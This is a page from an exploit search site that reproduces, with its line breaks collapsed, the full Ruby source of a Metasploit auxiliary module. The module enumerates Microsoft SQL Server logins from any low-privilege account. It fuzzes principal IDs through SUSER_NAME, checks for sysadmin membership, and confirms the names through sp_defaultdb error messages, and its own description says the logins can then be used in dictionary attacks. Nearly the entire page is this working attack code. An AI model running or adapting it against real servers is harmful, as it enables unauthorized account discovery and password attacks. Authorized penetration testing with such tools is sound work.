Sploitus|Exploit 在线漏洞搜索引擎

## https://sploitus.com/exploit?id=MSF:AUXILIARY-ADMIN-MSSQL-MSSQL_ENUM_SQL_LOGINS-### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::MSSQLdef initialize(info = {})super(update_info(info,'Name' => 'Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration','Description' => %q{This module can be used to obtain a list of all logins from a SQL Server with any login.Selecting all of the logins from the master..syslogins table is restricted to sysadmins.However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Serverlogins using the SUSER_SNAME function by fuzzing the principal_id parameter. This ispretty simple, because the principal IDs assigned to logins are incremental. Once loginshave been enumerated they can be verified via sp_defaultdb error analysis. This isimportant, because not all of the principal IDs resolve to SQL logins (some resolve toroles instead). Once logins have been enumerated, they can be used in dictionary attacks.},'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],'License' => MSF_LICENSE,'References' => [['URL','https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql']]))register_options([OptInt.new('FuzzNum', [true, 'Number of principal_ids to fuzz.', 300]),])enddef run# Check connection and issue initial queryprint_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")if mssql_login_datastoreprint_good('Connected.')elseprint_error('Login was unsuccessful. Check your credentials.')disconnectreturnend# Query for sysadmin statusprint_status("Checking if #{datastore['USERNAME']} has the sysadmin role...")user_status = check_sysadmin# Check if user has sysadmin roleif user_status == 1print_good("#{datastore['USERNAME']} is a sysadmin.")elseprint_status("#{datastore['USERNAME']} is NOT a sysadmin.")end# Get a list if sql server logins using SUSER_NAME()print_status("Setup to fuzz #{datastore['FuzzNum']} SQL Server logins.")print_status('Enumerating logins...')sql_logins_list = get_sql_loginsif sql_logins_list.nil? || sql_logins_list.empty?print_error('Sorry, somethings went wrong - SQL Server logins were found.')disconnectreturnelse# Print number of initial logins foundprint_good("#{sql_logins_list.length} initial SQL Server logins were found.")sql_logins_list.sort.each do |sql_login|if datastore['VERBOSE']print_status(" - #{sql_login}")endendend# Verify the enumerated SQL Logins using sp_defaultdb error ananlysisprint_status('Verifying the SQL Server logins...')sql_logins_list_verified = verify_logins(sql_logins_list)if sql_logins_list_verified.nil?print_error('Sorry, no SQL Server logins could be verified.')disconnectreturnelse# Display list verified SQL Server loginsprint_good("#{sql_logins_list_verified.length} SQL Server logins were verified:")sql_logins_list_verified.sort.each do |sql_login|print_status(" - #{sql_login}")endenddisconnectend# Checks if user is a sysadmindef check_sysadmin# Setup query to check for sysadminsql = "select is_srvrolemember('sysadmin') as IsSysAdmin"# Run queryresult = mssql_query(sql)# Parse query resultsparse_results = result[:rows]status = parse_results[0][0]# Return statusreturn statusend# Gets trusted databases owned by sysadminsdef get_sql_logins# Create array to store the sql loginssql_logins = []# Fuzz the principal_id parameter passed to the SUSER_NAME function(1..datastore['FuzzNum']).each do |principal_id|# Setup querysql = "SELECT SUSER_NAME(#{principal_id}) as login"# Execute queryresult = mssql_query(sql)# Parse resultsparse_results = result[:rows]sql_login = parse_results[0][0]# Add to sql server login listsql_logins.push(sql_login) unless sql_logins.include?(sql_login)end# Return list of loginssql_loginsend# Checks if user has the db_owner roledef verify_logins(sql_logins_list)# Create array for later useverified_sql_logins = []fake_db_name = Rex::Text.rand_text_alpha_upper(24)# Check if the user has the db_owner role is any databasessql_logins_list.each do |sql_login|# Setup querysql = "EXEC sp_defaultdb '#{sql_login}', '#{fake_db_name}'"# Execute queryresult = mssql_query(sql)# Parse resultsparse_results = result[:errors]result = parse_results[0]# Check if sid resolved to a sql loginif result.include?(fake_db_name)verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)end# Check if sid resolved to a sql loginif result.include?('alter the login')# Add sql server login to verified listverified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)endendverified_sql_loginsendend